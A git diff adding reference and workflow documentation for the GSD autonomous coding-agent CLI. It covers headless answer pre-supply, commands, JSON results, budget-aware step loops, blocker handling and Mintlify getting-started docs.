b/gsd-orchestrator/references/answer-injection.md @@ -0,0 +1,119 @@ +# Answer Injection + +Pre-supply answers and secrets to eliminate interactive prompts during headless execution. + +## Usage + +```bash +gsd headless --answers answers.json auto +gsd headless --answers answers.json new-milestone --context spec.md --auto +``` + +The `--answers` flag takes a path to a JSON file containing pre-supplied answers and secrets. + +## Answer File Schema + +```json +{ + "questions": { + "question_id": "selected_option_label", + "multi_select_question": ["option_a", "option_b"] + }, + "secrets": { + "API_KEY": "sk-...", + "DATABASE_URL": "postgres://..." + }, + "defaults": { + "strategy": "first_option" + } +} +``` + +### Fields + +| Field | Type | Description | +|-------|------|-------------| +| `questions` | `Record` | Map question ID → answer. String for single-select, string array for multi-select. | +| `secrets` | `Record` | Map env var name → value. Injected into child process environment variables. | +| `defaults.strategy` | `"first_option" \| "cancel"` | Fallback for unmatched questions. Default: `"first_option"`. | + +## How Secrets Work + +Secrets are injected as environment variables into the GSD child process: + +1. The orchestrator passes the answer file via `--answers` +2. GSD reads the file and sets secret values as env vars in the child process +3. When `secure_env_collect` runs inside the agent, it finds the keys already in `process.env` +4. The tool skips the interactive prompt and reports the keys as "already configured" + +Secrets are never logged or included in event streams. + +## How Question Matching Works + +Two-phase correlation: + +1. **Observe** — GSD monitors `tool_execution_start` events for `ask_user_questions` to extract question metadata (ID, options, allowMultiple) +2. **Match** — Subsequent `extension_ui_request` events are correlated to the metadata and responded to with the pre-supplied answer + +Handles out-of-order events (extension_ui_request can arrive before tool_execution_start) via a deferred processing queue with 500ms timeout. + +## Coexistence with `--supervised` + +Both `--answers` and `--supervised` can be active simultaneously. Priority order: + +1. Answer injector tries first +2. If no answer found, supervised mode forwards to the orchestrator +3. If no orchestrator response within `--response-timeout`, the auto-responder kicks in + +## Without Answer Injection + +Headless mode has built-in auto-responders for all prompt types: + +| Prompt Type | Default Behavior | +|-------------|-----------------| +| Select | Picks first option | +| Confirm | Auto-confirms | +| Input | Empty string | +| Editor | Returns prefill or empty | + +Answer injection overrides these defaults with specific answers when precision matters. + +## Diagnostics + +The injector tracks statistics printed in the session summary: + +| Stat | Description | +|------|-------------| +| `questionsAnswered` | Questions resolved from the answer file | +| `questionsDefaulted` | Questions handled by the default strategy | +| `secretsProvided` | Number of secrets injected | + +Unused question IDs and secret keys are warned about at exit. + +## Example: Orchestrator with Answers + +```bash +# Create answer file +cat > answers.json << 'EOF' +{ + "questions": { + "test_framework": "vitest", + "package_manager": "pnpm" + }, + "secrets": { + "OPENAI_API_KEY": "sk-...", + "DATABASE_URL": "postgres://localhost:5432/mydb" + }, + "defaults": { + "strategy": "first_option" + } +} +EOF + +# Run with pre-supplied answers +gsd headless --answers answers.json --output-format json auto 2>/dev/null + +# Parse result +RESULT=$(gsd headless --answers answers.json --output-format json next 2>/dev/null) +echo "$RESULT" | jq '{status: .status, cost: .cost.total}' +``` diff --git a/gsd-orchestrator/references/commands.md b/gsd-orchestrator/references/commands.md new file mode 100644 index 000000000..52b55d61a --- /dev/null +++ b/gsd-orchestrator/references/commands.md @@ -0,0 +1,210 @@ +# GSD Commands Reference + +All commands run as subprocesses via `gsd headless [flags] [command] [args...]`. + +## Global Flags + +These flags apply to any `gsd headless` invocation: + +| Flag | Description | +|------|-------------| +| `--output-format ` | `text` (default), `json` (structured result), `stream-json` (JSONL) | +| `--json` | Alias for `--output-format stream-json` | +| `--bare` | Minimal context: skip CLAUDE.md, AGENTS.md, user settings, user skills | +| `--resume ` | Resume a prior headless session by ID | +| `--timeout N` | Overall timeout in ms (default: 300000) | +| `--model ID` | Override LLM model | +| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin | +| `--response-timeout N` | Timeout for orchestrator response in supervised mode (default: 30000ms) | +| `--answers ` | Pre-supply answers and secrets from JSON file | +| `--events ` | Filter JSONL output to specific event types (comma-separated, implies `--json`) | +| `--verbose` | Show tool calls in progress output | + +## Exit Codes + +| Code | Meaning | When | +|------|---------|------| +| `0` | Success | Unit/milestone completed normally | +| `1` | Error or timeout | Runtime error, LLM failure, or `--timeout` exceeded | +| `10` | Blocked | Execution hit a blocker requiring human intervention | +| `11` | Cancelled | User or orchestrator cancelled the operation | + +## Workflow Commands + +### `auto` (default) + +Autonomous mode — loop through all pending units until milestone complete or blocked. + +```bash +gsd headless --output-format json auto +``` + +### `next` + +Step mode — execute exactly one unit (task/slice/milestone step), then exit. Recommended for orchestrators that need decision points between steps. + +```bash +gsd headless --output-format json next +``` + +### `new-milestone` + +Create a milestone from a specification document. + +```bash +gsd headless new-milestone --context spec.md +gsd headless new-milestone --context spec.md --auto +gsd headless new-milestone --context-text "Build a REST API" --auto +cat spec.md | gsd headless new-milestone --context - --auto +``` + +Extra flags: +- `--context ` — path to spec/PRD file (use `-` for stdin) +- `--context-text ` — inline specification text +- `--auto` — start auto-mode after milestone creation + +### `dispatch ` + +Force-route to a specific phase, bypassing normal state-machine routing. + +```bash +gsd headless dispatch research +gsd headless dispatch plan +gsd headless dispatch execute +gsd headless dispatch complete +gsd headless dispatch reassess +gsd headless dispatch uat +gsd headless dispatch replan +``` + +### `discuss` + +Start guided milestone/slice discussion. + +```bash +gsd headless discuss +``` + +### `stop` + +Stop auto-mode gracefully. + +```bash +gsd headless stop +``` + +### `pause` + +Pause auto-mode (preserves state, resumable). + +```bash +gsd headless pause +``` + +## State Inspection + +### `query` + +**Instant JSON snapshot** — state, next dispatch, parallel costs. No LLM, ~50ms. The recommended way for orchestrators to inspect state. + +```bash +gsd headless query +gsd headless query | jq '.state.phase' +gsd headless query | jq '.next' +gsd headless query | jq '.cost.total' +``` + +### `status` + +Progress dashboard (TUI overlay — useful interactively, not for parsing). + +```bash +gsd headless status +``` + +### `history` + +Execution history. Supports `--cost`, `--phase`, `--model`, and `limit` arguments. + +```bash +gsd headless history +``` + +## Unit Control + +### `skip` + +Prevent a unit from auto-mode dispatch. + +```bash +gsd headless skip +``` + +### `undo` + +Revert last completed unit. Use `--force` to bypass confirmation. + +```bash +gsd headless undo +gsd headless undo --force +``` + +### `steer ` + +Hard-steer plan documents during execution. Useful for mid-course corrections. + +```bash +gsd headless steer "Skip the blocked dependency, use mock instead" +``` + +### `queue` + +Queue and reorder future milestones. + +```bash +gsd headless queue +``` + +## Configuration & Health + +### `doctor` + +Runtime health checks with auto-fix. + +```bash +gsd headless doctor +``` + +### `prefs` + +Manage preferences (global/project/status/wizard/setup). + +```bash +gsd headless prefs +``` + +### `knowledge ` + +Add persistent project knowledge. + +```bash +gsd headless knowledge "Always use UTC timestamps in API responses" +``` + +## Phases + +GSD workflows progress through these phases: + +``` +pre-planning → needs-discussion → discussing → researching → planning → +executing → verifying → summarizing → advancing → validating-milestone → +completing-milestone → complete +``` + +Special phases: `paused`, `blocked`, `replanning-slice` + +## Hierarchy + +- **Milestone**: Shippable version (4–10 slices, 1–4 weeks) +- **Slice**: One demoable vertical capability (1–7 tasks, 1–3 days) +- **Task**: One context-window-sized unit of work (one session) diff --git a/gsd-orchestrator/references/json-result.md b/gsd-orchestrator/references/json-result.md new file mode 100644 index 000000000..50eff75c8 --- /dev/null +++ b/gsd-orchestrator/references/json-result.md @@ -0,0 +1,162 @@ +# HeadlessJsonResult Reference + +When using `--output-format json`, GSD collects events silently and emits a single `HeadlessJsonResult` JSON object to stdout at process exit. This is the structured result for orchestrator decision-making. + +## Obtaining the Result + +```bash +# Capture the JSON result +RESULT=$(gsd headless --output-format json next 2>/dev/null) +EXIT=$? + +# Parse fields with jq +echo "$RESULT" | jq '.status' +echo "$RESULT" | jq '.cost.total' +echo "$RESULT" | jq '.nextAction' +``` + +**Important:** Progress text goes to stderr. The JSON result goes to stdout. Redirect stderr to `/dev/null` when parsing stdout. + +## Field Reference + +### Top-Level Fields + +| Field | Type | Description | +|-------|------|-------------| +| `status` | `"success" \| "error" \| "blocked" \| "cancelled" \| "timeout"` | Final session status. Maps directly to exit codes. | +| `exitCode` | `number` | Process exit code: `0` (success), `1` (error/timeout), `10` (blocked), `11` (cancelled). | +| `sessionId` | `string \| undefined` | Session identifier. Pass to `--resume ` to continue this session. | +| `duration` | `number` | Session wall-clock duration in milliseconds. | +| `cost` | `CostObject` | Token usage and cost breakdown. See below. | +| `toolCalls` | `number` | Total number of tool calls made during the session. | +| `events` | `number` | Total number of events processed during the session. | +| `milestone` | `string \| undefined` | Active milestone ID (e.g. `"M001"`). | +| `phase` | `string \| undefined` | Current GSD phase at session end (e.g. `"executing"`, `"blocked"`, `"complete"`). | +| `nextAction` | `string \| undefined` | Recommended next action from the state machine (e.g. `"dispatch"`, `"complete"`). | +| `artifacts` | `string[] \| undefined` | Paths to artifacts created or modified during the session. | +| `commits` | `string[] \| undefined` | Git commit SHAs created during the session. | + +### Status → Exit Code Mapping + +| Status | Exit Code | Constant | Meaning | +|--------|-----------|----------|---------| +| `success` | `0` | `EXIT_SUCCESS` | Unit or milestone completed successfully | +| `error` | `1` | `EXIT_ERROR` | Runtime error or LLM failure | +| `timeout` | `1` | `EXIT_ERROR` | `--timeout` deadline exceeded | +| `blocked` | `10` | `EXIT_BLOCKED` | Execution blocked — needs human intervention | +| `cancelled` | `11` | `EXIT_CANCELLED` | Cancelled by user or orchestrator | + +### Cost Object + +| Field | Type | Description | +|-------|------|-------------| +| `cost.total` | `number` | Total cost in USD for the session. | +| `cost.input_tokens` | `number` | Number of input tokens consumed. | +| `cost.output_tokens` | `number` | Number of output tokens generated. | +| `cost.cache_read_tokens` | `number` | Number of tokens served from prompt cache. | +| `cost.cache_write_tokens` | `number` | Number of tokens written to prompt cache. | + +## Parsing Patterns + +### Decision-Making After Each Step + +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) +EXIT=$? + +case $EXIT in + 0) + PHASE=$(echo "$RESULT" | jq -r '.phase') + NEXT=$(echo "$RESULT" | jq -r '.nextAction') + echo "Success — phase: $PHASE, next: $NEXT" + ;; + 1) + STATUS=$(echo "$RESULT" | jq -r '.status') + echo "Failed — status: $STATUS" + ;; + 10) + echo "Blocked — needs intervention" + gsd headless query | jq '.state' + ;; + 11) + echo "Cancelled" + ;; +esac +``` + +### Cost Tracking + +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) + +COST=$(echo "$RESULT" | jq -r '.cost.total') +INPUT=$(echo "$RESULT" | jq -r '.cost.input_tokens') +OUTPUT=$(echo "$RESULT" | jq -r '.cost.output_tokens') + +echo "Cost: \$$COST (${INPUT} in / ${OUTPUT} out)" +``` + +### Session Resumption + +```bash +# First run — capture session ID +RESULT=$(gsd headless --output-format json next 2>/dev/null) +SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId') + +# Resume the same session later +gsd headless --resume "$SESSION_ID" --output-format json next 2>/dev/null +``` + +### Artifact Collection + +```bash +RESULT=$(gsd headless --output-format json auto 2>/dev/null) + +# List files created/modified +echo "$RESULT" | jq -r '.artifacts[]?' + +# List commits made +echo "$RESULT" | jq -r '.commits[]?' +``` + +## Example Result + +```json +{ + "status": "success", + "exitCode": 0, + "sessionId": "abc123def456", + "duration": 45200, + "cost": { + "total": 0.42, + "input_tokens": 15000, + "output_tokens": 3500, + "cache_read_tokens": 8000, + "cache_write_tokens": 2000 + }, + "toolCalls": 12, + "events": 87, + "milestone": "M001", + "phase": "executing", + "nextAction": "dispatch", + "artifacts": [ + ".gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md" + ], + "commits": [ + "a1b2c3d" + ] +} +``` + +## Combined with `query` for Full Picture + +The `HeadlessJsonResult` captures what happened during a session. Use `query` for the current project state: + +```bash +# What happened in this step? +RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '{status, cost: .cost.total, phase}' + +# What's the overall project state now? +gsd headless query | jq '{phase: .state.phase, progress: .state.progress, totalCost: .cost.total}' +``` diff --git a/gsd-orchestrator/templates/spec.md b/gsd-orchestrator/templates/spec.md new file mode 100644 index 000000000..441880f39 --- /dev/null +++ b/gsd-orchestrator/templates/spec.md @@ -0,0 +1,20 @@ +# [Product Name] + +## What +[One paragraph: what this product does. Be concrete — "A CLI tool that converts CSV files to JSON" not "A data transformation solution".] + +## Requirements +- [User can DO something specific and observable] +- [User can DO another specific thing] +- [System DOES something automatically] +- [Error case: system handles X gracefully] + +## Technical Constraints +- Language: [Node.js / Python / Go / Rust / etc.] +- Framework: [Express / FastAPI / none / etc.] +- External dependencies: [list APIs, databases, services] +- Environment: [Node >= 22 / Python 3.12+ / etc.] + +## Out of Scope +- [Explicit exclusion 1 — prevents scope creep] +- [Explicit exclusion 2] diff --git a/gsd-orchestrator/workflows/build-from-spec.md b/gsd-orchestrator/workflows/build-from-spec.md new file mode 100644 index 000000000..e3c70e02c --- /dev/null +++ b/gsd-orchestrator/workflows/build-from-spec.md @@ -0,0 +1,184 @@ +# Build From Spec + +End-to-end workflow: take a product idea or specification, produce working software. + +## Prerequisites + +- `gsd` CLI installed (`npm install -g gsd-pi`) +- A directory for the project (can be empty) +- Git initialized in the directory + +## Process + +### Step 1: Prepare the project directory + +```bash +PROJECT_DIR="/tmp/my-project-name" +mkdir -p "$PROJECT_DIR" +cd "$PROJECT_DIR" +git init 2>/dev/null # GSD needs a git repo +``` + +### Step 2: Write the spec file + +Write a spec file that describes what to build. More detail = better results. + +```bash +cat > spec.md << 'SPEC' +# Product Name + +## What +[Concrete description of what to build] + +## Requirements +- [Specific, testable requirement 1] +- [Specific, testable requirement 2] +- [Specific, testable requirement 3] + +## Technical Constraints +- [Language, framework, or platform requirements] +- [External services or APIs involved] +- [Performance or security requirements] + +## Out of Scope +- [Things explicitly NOT included] +SPEC +``` + +**Spec quality matters.** Vague specs produce vague results. Include: +- What the user can DO when it's done (not what code to write) +- Technical constraints (language, framework, Node version) +- What's out of scope (prevents scope creep) + +### Step 3: Launch the build + +**Fire-and-forget (simplest — GSD does everything):** +```bash +cd "$PROJECT_DIR" +RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? +``` + +`--timeout 0` disables the timeout for long builds. `--auto` chains milestone creation into execution. + +**With budget limit:** +```bash +# Use step-by-step mode with budget checks instead of auto +# See workflows/step-by-step.md +``` + +**For CI or ecosystem runs (no user config):** +```bash +RESULT=$(gsd headless --bare --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? +``` + +### Step 4: Handle the result + +```bash +case $EXIT in + 0) + # Success — verify deliverables + STATUS=$(echo "$RESULT" | jq -r '.status') + COST=$(echo "$RESULT" | jq -r '.cost.total') + COMMITS=$(echo "$RESULT" | jq -r '.commits | length') + echo "Build complete: $STATUS, cost: \$$COST, commits: $COMMITS" + + # Inspect what was built + gsd headless query | jq '.state.progress' + + # Check the actual files + ls -la "$PROJECT_DIR" + ;; + 1) + # Error — inspect and decide + echo "Build failed" + echo "$RESULT" | jq '{status: .status, phase: .phase}' + + # Check state for details + gsd headless query | jq '.state' + ;; + 10) + # Blocked — needs intervention + echo "Build blocked — needs human input" + gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers}' + + # Options: steer, supply answers, or escalate + # See workflows/monitor-and-poll.md for blocker handling + ;; + 11) + echo "Build was cancelled" + ;; +esac +``` + +### Step 5: Verify deliverables + +After a successful build, verify the output: + +```bash +cd "$PROJECT_DIR" + +# Check project state +gsd headless query | jq '{ + phase: .state.phase, + progress: .state.progress, + cost: .cost.total +}' + +# Check git log for what was built +git log --oneline + +# Run the project's own tests if they exist +[ -f package.json ] && npm test 2>/dev/null +[ -f Makefile ] && make test 2>/dev/null +``` + +## Complete Example + +```bash +# 1. Setup +mkdir -p /tmp/todo-api && cd /tmp/todo-api && git init + +# 2. Write spec +cat > spec.md << 'SPEC' +# Todo API + +Build a REST API for managing todo items using Node.js and Express. + +## Requirements +- GET /todos — list all todos +- POST /todos — create a todo (title, completed) +- PUT /todos/:id — update a todo +- DELETE /todos/:id — delete a todo +- Todos stored in-memory (no database) +- Input validation with descriptive error messages +- Health check endpoint at GET /health + +## Technical Constraints +- Node.js with ESM modules +- Express framework +- No external database — in-memory array +- Port configurable via PORT env var (default 3000) + +## Out of Scope +- Authentication +- Persistent storage +- Frontend +SPEC + +# 3. Launch +RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? + +# 4. Report +if [ $EXIT -eq 0 ]; then + COST=$(echo "$RESULT" | jq -r '.cost.total') + echo "Build complete (\$$COST)" + echo "Files created:" + find . -not -path './.gsd/*' -not -path './.git/*' -type f +else + echo "Build failed (exit $EXIT)" + echo "$RESULT" | jq . +fi +``` diff --git a/gsd-orchestrator/workflows/monitor-and-poll.md b/gsd-orchestrator/workflows/monitor-and-poll.md new file mode 100644 index 000000000..346cb8613 --- /dev/null +++ b/gsd-orchestrator/workflows/monitor-and-poll.md @@ -0,0 +1,187 @@ +# Monitor and Poll + +Check status of a GSD project, handle blockers, track costs, and decide next actions. + +## Checking Project State + +The `query` command is your primary monitoring tool. It's instant (~50ms), costs nothing (no LLM), and returns the full project snapshot. + +```bash +cd /path/to/project +gsd headless query +``` + +### Key fields to inspect + +```bash +# Overall status +gsd headless query | jq '{ + phase: .state.phase, + milestone: .state.activeMilestone.id, + slice: .state.activeSlice.id, + task: .state.activeTask.id, + progress: .state.progress, + cost: .cost.total +}' + +# What should happen next +gsd headless query | jq '.next' +# Returns: { "action": "dispatch", "unitType": "execute-task", "unitId": "M001/S01/T01" } + +# Is it done? +gsd headless query | jq '.state.phase' +# "complete" = done, "blocked" = needs you, anything else = in progress +``` + +### Phase meanings + +| Phase | Meaning | Your action | +|-------|---------|-------------| +| `pre-planning` | Milestone exists, no slices planned yet | Run `auto` or `next` | +| `needs-discussion` | Ambiguities need resolution | Supply answers or run with defaults | +| `discussing` | Discussion in progress | Wait | +| `researching` | Codebase/library research | Wait | +| `planning` | Creating task plans | Wait | +| `executing` | Writing code | Wait | +| `verifying` | Checking must-haves | Wait | +| `summarizing` | Recording what happened | Wait | +| `advancing` | Moving to next task/slice | Wait | +| `evaluating-gates` | Quality checks before execution | Wait or run `next` | +| `validating-milestone` | Final milestone checks | Wait | +| `completing-milestone` | Archiving and cleanup | Wait | +| `complete` | Done | Verify deliverables | +| `blocked` | Needs human input | Handle blocker (see below) | +| `paused` | Explicitly paused | Resume with `auto` | + +## Handling Blockers + +When exit code is `10` or phase is `blocked`: + +```bash +# 1. Understand the blocker +gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers, nextAction: .state.nextAction}' + +# 2. Option A: Steer around it +gsd headless steer "Skip the database dependency, use in-memory storage instead" + +# 3. Option B: Supply pre-built answers +cat > fix.json << 'EOF' +{ + "questions": { "blocked_question_id": "workaround_option" }, + "defaults": { "strategy": "first_option" } +} +EOF +gsd headless --answers fix.json auto + +# 4. Option C: Force a specific phase +gsd headless dispatch replan + +# 5. Option D: Escalate to user +echo "GSD build blocked. Phase: $(gsd headless query | jq -r '.state.phase')" +echo "Manual intervention required." +``` + +## Cost Tracking + +```bash +# Current cumulative cost +gsd headless query | jq '.cost.total' + +# Per-worker breakdown +gsd headless query | jq '.cost.workers' + +# After a step (from HeadlessJsonResult) +RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '.cost' +``` + +### Budget enforcement pattern + +```bash +MAX_BUDGET=15.00 + +check_budget() { + TOTAL=$(gsd headless query | jq -r '.cost.total') + OVER=$(echo "$TOTAL > $MAX_BUDGET" | bc -l) + if [ "$OVER" = "1" ]; then + echo "Budget exceeded: \$$TOTAL > \$$MAX_BUDGET" + gsd headless stop + return 1 + fi + return 0 +} +``` + +## Poll-and-React Loop + +For agents that need to periodically check on a build: + +```bash +cd /path/to/project + +poll_project() { + STATE=$(gsd headless query 2>/dev/null) + if [ -z "$STATE" ]; then + echo "NO_PROJECT" + return + fi + + PHASE=$(echo "$STATE" | jq -r '.state.phase') + COST=$(echo "$STATE" | jq -r '.cost.total') + PROGRESS=$(echo "$STATE" | jq -r '"\(.state.progress.milestones.done)/\(.state.progress.milestones.total) milestones, \(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"') + + case "$PHASE" in + complete) + echo "COMPLETE cost=\$$COST progress=$PROGRESS" + ;; + blocked) + BLOCKER=$(echo "$STATE" | jq -r '.state.nextAction // "unknown"') + echo "BLOCKED reason=$BLOCKER cost=\$$COST" + ;; + *) + NEXT=$(echo "$STATE" | jq -r '.next.action // "none"') + echo "IN_PROGRESS phase=$PHASE next=$NEXT cost=\$$COST progress=$PROGRESS" + ;; + esac +} +``` + +## Resuming Work + +If a build was interrupted or you need to continue: + +```bash +cd /path/to/project + +# Check current state +gsd headless query | jq '.state.phase' + +# Resume from where it left off +gsd headless --output-format json auto 2>/dev/null + +# Or resume a specific session +gsd headless --resume "$SESSION_ID" --output-format json auto 2>/dev/null +``` + +## Reading Build Artifacts + +After completion, inspect what GSD produced: + +```bash +cd /path/to/project + +# Project summary +cat .gsd/PROJECT.md + +# What was decided +cat .gsd/DECISIONS.md + +# Requirements and their validation status +cat .gsd/REQUIREMENTS.md + +# Milestone summary +cat .gsd/milestones/M001-*/M001-*-SUMMARY.md 2>/dev/null + +# Git history (GSD commits per-slice) +git log --oneline +``` diff --git a/gsd-orchestrator/workflows/step-by-step.md b/gsd-orchestrator/workflows/step-by-step.md new file mode 100644 index 000000000..1690aa306 --- /dev/null +++ b/gsd-orchestrator/workflows/step-by-step.md @@ -0,0 +1,156 @@ +# Step-by-Step Execution + +Run GSD one unit at a time with decision points between steps. Use this when you need +control over execution — budget enforcement, progress reporting, conditional logic, +or the ability to steer mid-build. + +## When to use this vs `auto` + +| Approach | Use when | +|----------|----------| +| `auto` | You trust the build, just want the result | +| `next` loop | You need budget checks, progress updates, or intervention points | + +## Core Loop + +```bash +cd /path/to/project +MAX_BUDGET=20.00 +TOTAL_COST=0 + +while true; do + # Run one unit + RESULT=$(gsd headless --output-format json next 2>/dev/null) + EXIT=$? + + # Parse result + STATUS=$(echo "$RESULT" | jq -r '.status') + STEP_COST=$(echo "$RESULT" | jq -r '.cost.total') + PHASE=$(echo "$RESULT" | jq -r '.phase // empty') + SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId // empty') + + # Handle exit codes + case $EXIT in + 0) ;; # success — continue + 1) + echo "Step failed: $STATUS" + break + ;; + 10) + echo "Blocked — needs intervention" + gsd headless query | jq '.state' + break + ;; + 11) + echo "Cancelled" + break + ;; + esac + + # Check if milestone complete + CURRENT_PHASE=$(gsd headless query | jq -r '.state.phase') + if [ "$CURRENT_PHASE" = "complete" ]; then + TOTAL_COST=$(gsd headless query | jq -r '.cost.total') + echo "Milestone complete. Total cost: \$$TOTAL_COST" + break + fi + + # Budget check + TOTAL_COST=$(gsd headless query | jq -r '.cost.total') + OVER=$(echo "$TOTAL_COST > $MAX_BUDGET" | bc -l) + if [ "$OVER" = "1" ]; then + echo "Budget limit (\$$MAX_BUDGET) exceeded at \$$TOTAL_COST" + gsd headless stop + break + fi + + # Progress report + PROGRESS=$(gsd headless query | jq -r '"\(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"') + echo "Step done ($STATUS). Phase: $CURRENT_PHASE, Progress: $PROGRESS, Cost: \$$TOTAL_COST" +done +``` + +## Step-by-Step with Spec Creation + +Complete flow from idea to working code with full control: + +```bash +# 1. Setup +PROJECT_DIR="/tmp/my-project" +mkdir -p "$PROJECT_DIR" && cd "$PROJECT_DIR" && git init 2>/dev/null + +# 2. Write spec +cat > spec.md << 'SPEC' +[Your spec here] +SPEC + +# 3. Create the milestone (planning only, no execution) +RESULT=$(gsd headless --output-format json --context spec.md new-milestone 2>/dev/null) +EXIT=$? + +if [ $EXIT -ne 0 ]; then + echo "Milestone creation failed" + echo "$RESULT" | jq . + exit 1 +fi + +echo "Milestone created. Starting execution..." + +# 4. Execute step-by-step +STEP=0 +while true; do + STEP=$((STEP + 1)) + RESULT=$(gsd headless --output-format json next 2>/dev/null) + EXIT=$? + + [ $EXIT -ne 0 ] && break + + PHASE=$(gsd headless query | jq -r '.state.phase') + COST=$(gsd headless query | jq -r '.cost.total') + + echo "Step $STEP complete. Phase: $PHASE, Cost: \$$COST" + + [ "$PHASE" = "complete" ] && break +done + +echo "Build finished in $STEP steps" +``` + +## Intervention Patterns + +### Steer mid-execution + +If you detect the build going in the wrong direction: + +```bash +# Check what's happening +gsd headless query | jq '{phase: .state.phase, task: .state.activeTask}' + +# Redirect +gsd headless steer "Use SQLite instead of PostgreSQL for storage" + +# Continue +gsd headless --output-format json next 2>/dev/null +``` + +### Skip a stuck unit + +```bash +gsd headless skip +gsd headless --output-format json next 2>/dev/null +``` + +### Undo last completed unit + +```bash +gsd headless undo --force +gsd headless --output-format json next 2>/dev/null +``` + +### Force a specific phase + +```bash +gsd headless dispatch replan # Re-plan the current slice +gsd headless dispatch execute # Skip to execution +gsd headless dispatch uat # Jump to user acceptance testing +``` diff --git a/mintlify-docs/docs.json b/mintlify-docs/docs.json new file mode 100644 index 000000000..54bdfafea --- /dev/null +++ b/mintlify-docs/docs.json @@ -0,0 +1,101 @@ +{ + "$schema": "https://mintlify.com/docs.json", + "theme": "mint", + "name": "GSD", + "logo": { + "light": "/images/logo.svg", + "dark": "/images/logo.svg", + "href": "https://github.com/gsd-build/gsd-2/tree/main/docs" + }, + "favicon": "/images/favicon.svg", + "colors": { + "primary": "#7dcfff", + "light": "#7dcfff", + "dark": "#1a1b26" + }, + "appearance": { + "default": "dark" + }, + "background": { + "decoration": "gradient" + }, + "fonts": { + "heading": { + "family": "JetBrains Mono", + "weight": 700 + }, + "body": { + "family": "Inter", + "weight": 400 + } + }, + "navbar": { + "links": [ + { + "label": "GitHub", + "href": "https://github.com/gsd-build/gsd-2" + } + ], + "primary": { + "type": "button", + "label": "Install", + "href": "/getting-started" + } + }, + "footer": { + "socials": { + "github": "https://github.com/gsd-build/gsd-2" + } + }, + "navigation": { + "groups": [ + { + "group": "Getting started", + "pages": [ + "introduction", + "getting-started" + ] + }, + { + "group": "Core concepts", + "pages": [ + "guides/auto-mode", + "guides/commands", + "guides/git-strategy" + ] + }, + { + "group": "Configuration", + "pages": [ + "guides/configuration", + "guides/custom-models", + "guides/token-optimization", + "guides/dynamic-model-routing", + "guides/cost-management" + ] + }, + { + "group": "Features", + "pages": [ + "guides/captures-triage", + "guides/parallel-orchestration", + "guides/remote-questions", + "guides/skills", + "guides/visualizer", + "guides/web-interface", + "guides/working-in-teams" + ] + }, + { + "group": "Reference", + "pages": [ + "guides/troubleshooting", + "guides/migration" + ] + } + ] + }, + "search": { + "prompt": "Search GSD docs..." + } +} diff --git a/mintlify-docs/getting-started.mdx b/mintlify-docs/getting-started.mdx new file mode 100644 index 000000000..64cc49646 --- /dev/null +++ b/mintlify-docs/getting-started.mdx @@ -0,0 +1,187 @@ +--- +title: "Getting started" +description: "Install GSD, configure your LLM provider, and run your first autonomous session." +--- + +## Install + +```bash +npm install -g gsd-pi +``` + +Requires Node.js 22+ and Git. + + +**`command not found: gsd`?** Your shell may not have npm's global bin directory in `$PATH`. Run `npm prefix -g` to find it, then add `$(npm prefix -g)/bin` to your PATH. See [troubleshooting](/guides/troubleshooting) for details. + + +GSD checks for updates every 24 hours. Update in-session with `/gsd update`. + +## First launch + +```bash +gsd +``` + +On first launch, a setup wizard walks you through: + +1. **LLM provider** — 20+ providers (Anthropic, OpenAI, Google, OpenRouter, GitHub Copilot, Amazon Bedrock, Azure, and more). OAuth handles Claude Max and Copilot subscriptions automatically; otherwise paste an API key. +2. **Tool API keys** (optional) — Brave Search, Context7, Jina, Slack, Discord. Press Enter to skip any. + +Re-run the wizard anytime: + +```bash +gsd config +``` + +### Set up API keys + +For non-Anthropic models, you may need a search API key. Run `/gsd config` to set keys globally — they're saved to `~/.gsd/agent/auth.json` and apply to all projects. + +### Set up MCP servers + +To connect GSD to local or external MCP servers, add project-local config in `.mcp.json` or `.gsd/mcp.json`. See [configuration](/guides/configuration) for examples. Use `/gsd mcp` to verify connectivity. + +### Offline mode + +GSD works fully offline with local models (Ollama, vLLM, LM Studio). Configure a [custom model](/guides/custom-models) and GSD handles the rest — no internet connection required. + +## Choose a model + +GSD auto-selects a default model after login. Switch anytime: + +``` +/model +``` + +Or configure per-phase models in [preferences](/guides/configuration). + +## Two ways to work + + + + Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each with a wizard showing what completed and what's next. + + - **No `.gsd/` directory** → starts a discussion to capture your project vision + - **Milestone exists, no roadmap** → discuss or research the milestone + - **Roadmap exists, slices pending** → plan the next slice or execute a task + - **Mid-task** → resume where you left off + + + Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, commits, and advances through every slice until the milestone is complete. + + ``` + /gsd auto + ``` + + See [auto mode](/guides/auto-mode) for the full details. + + + +## Two terminals, one project + +The recommended workflow: auto mode in one terminal, steering from another. + +**Terminal 1 — let it build:** + +```bash +gsd +/gsd auto +``` + +**Terminal 2 — steer while it works:** + +```bash +gsd +/gsd discuss # talk through architecture decisions +/gsd status # check progress +/gsd queue # queue the next milestone +``` + +Both terminals read and write the same `.gsd/` files. Decisions in terminal 2 are picked up at the next phase boundary automatically. + +## Project structure + +GSD organizes work into a hierarchy: + +``` +Milestone → a shippable version (4-10 slices) + Slice → one demoable vertical capability (1-7 tasks) + Task → one context-window-sized unit of work +``` + +All state lives on disk in `.gsd/`: + + +``` +.gsd/ + PROJECT.md — what the project is right now + REQUIREMENTS.md — requirement contract (active/validated/deferred) + DECISIONS.md — append-only architectural decisions + KNOWLEDGE.md — cross-session rules, patterns, and lessons + RUNTIME.md — runtime context: API endpoints, env vars, services + STATE.md — quick-glance status + milestones/ + M001/ + M001-ROADMAP.md — slice plan with risk levels and dependencies + M001-CONTEXT.md — scope and goals 